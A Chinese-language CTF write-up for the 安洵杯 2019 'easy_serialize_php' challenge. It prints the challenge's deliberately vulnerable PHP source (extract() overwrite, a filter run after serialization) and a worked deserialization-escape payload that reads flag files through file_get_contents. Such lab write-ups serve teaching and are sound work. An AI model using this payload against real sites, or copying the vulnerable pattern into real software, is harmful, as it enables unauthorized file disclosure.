[安洵杯 2019]easy_serialize_php 1 WP

[安洵杯 2019]easy_serialize_php 1 WP

这道题目考察的主要是序列化与反序列化过程中，对象逃逸的一个漏洞。

说是对象逃逸，我觉得可能叫对象注入比较形象。

首先题目上来可以看到源码

<?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

变量覆写

首先关于这个部分

extract($_POST);

使用这个，我们可以任意post东西上去，覆写任意变量。

比如我们post一个SESSION['haha'] = 1, 这个时候原来SESSION的user，function和img项全部会消失，SESSION会只剩一个haha项，值为1

当然，如果我们post三个值user，function和img项上去，就可以替换原来的值。

这里倒没有那么方便，因为img的处理是在post之后进行的。

关于题目内容

简要概括一下就是对session的处理。

session里有三个参数

参数名	参数内容	参数用处
user	“guest"	用户名一类的参数，后面这里是溢出的payload入口
function	\(function = @\)_GET['f'];	由代码观察，这里是用于放入所选的函数的入口，如 highlight_file, phpinfo, show_image等
img	base64_encode('guest_img.png')	如果没有输入img_path, 就对img做这样的处理
	sha1(base64_encode($_GET['img_path']))	如果输入了img_path参数，就对img_path做这样的处理。

我们希望使用代码最后一句echo file_get_contents(base64_decode($userinfo['img']));读取到文件内容，

即phpinfo中core部分可以找到的d0g3_f1ag.php文件。

所以我们要让base64_decode($userinfo['img'] == "d0g3_f1ag.php"

所以$userinfo['img'] 要等于 ZDBnM19mMWFnLnBocA==

$_SESSION序列化后， 使用原函数中的filter过滤，然后再反序列化得到这里的$_userinfo。

但是原函数带的对img的处理方式有点让人难以接受，它对其Sha1哈希处理，没有办法利用，随引入本题使用的方式，序列化注入。

序列化逃逸（注入）

回顾一下题目对SESSION的处理。

SESSION --(序列化)--> --(filter函数过滤)--> --(反序列化)--> userinfo --> 读取以userinfo['img']为文件名的内容

在这个序列化和反序列化中间，多了一个过滤的步骤，这就让我们有机可趁。

反序列化从字符串构建变量，依靠关于变量长度的描述。

比如

s:4:"user"

读取这个user字符串，反序列化函数读取到4，就知道这个字符串有4个长度，遂读取4个字符。

然而，对于这个字符串

s:12:"flagflagflag";s:5:"guest";s:2:"hi";

在经过过滤后会变成

s:12:"";s:5:"guest";s:2:"hi";

这个时候，反序列化函数会根据前面的12，读取12个字符，生成这么一个对象

";s:5:"guest

它的值是

hi

知道了这么一个技巧后，我们就可以精心构建一个字符串

我们希望最终构建一个这样的SESSION

<?php
$_SESSION["user"] = "anything";
$_SESSION["function"] = "haha";
$_SESSION["img"] = "ZDBnM19mMWFnLnBocA==";

echo(serialize($_SESSION));
?>

##a:3:{s:4:"user";s:8:"anything";s:8:"function";s:4:"haha";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

然而，如果正常按照题目流程，生成的SESSION应该是这个样子的

<?php
$_SESSION["user"] = "guest";
$_SESSION["function"] = "highlight_file";
$_SESSION["img"] = base64_encode('guest_img.png');

echo(serialize($_SESSION));
?>

##a:3:{s:4:"user";s:5:"guest";s:8:"function";s:14:"highlight_file";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

我们考虑使用user的值，来吞掉后面的部分，即在guest的位置注入,然后让它一直吞到function后面那个数字冒号的位置，让传到function的值来充当原来的值(吞掉的为下面的黑色粗体方框内容)

a:3:{s:4:"user";s:5:"guest【";s:8:"function";s:14:】"highlight_file";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

所以function的值应该包含这些

;s:8:"function";s:4:"haha";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

题目中过滤掉了php，flag，即3位和4位的字符串，我们需要吞掉22位，考虑php*6 + flag

phpphpphpphpphpphpflag

最终服务端构建出来的字符串为这个样子(黑粗体方框内为我们传入的function内容)

a:3:{s:4:"user";s:22:"phpphpphpphpphpphpflag";s:8:"function";s:66:【";s:8:"function";s:4:"haha";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}】";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

经过过滤后是这个样子的

a:3:{s:4:"user";s:22:"";s:8:"function";s:66:";s:8:"function";s:4:"haha";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

这串字符串中，各个变量值为

变量名	变量值
user	";s:8:"function";s:66:
function	haha
img	ZDBnM19mMWFnLnBocA==

这样我们便完成了对img的覆写。原来的img覆写内容被丢在了序列化字符串外边，没有收到反序列化函数的光顾，像个孤儿。

最终我们传入的参数为

参数名	参数值
user	phpphpphpphpphpphpflag
function	;s:8:"function";s:4:"haha";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
f	show_image (get方式上传)

看下最终效果。

可以看到， 他说flag在/d0g3_fllllllag，我们同理读取

Base64后为

L2QwZzNfZmxsbGxsbGFn

记得包括斜杠

奈斯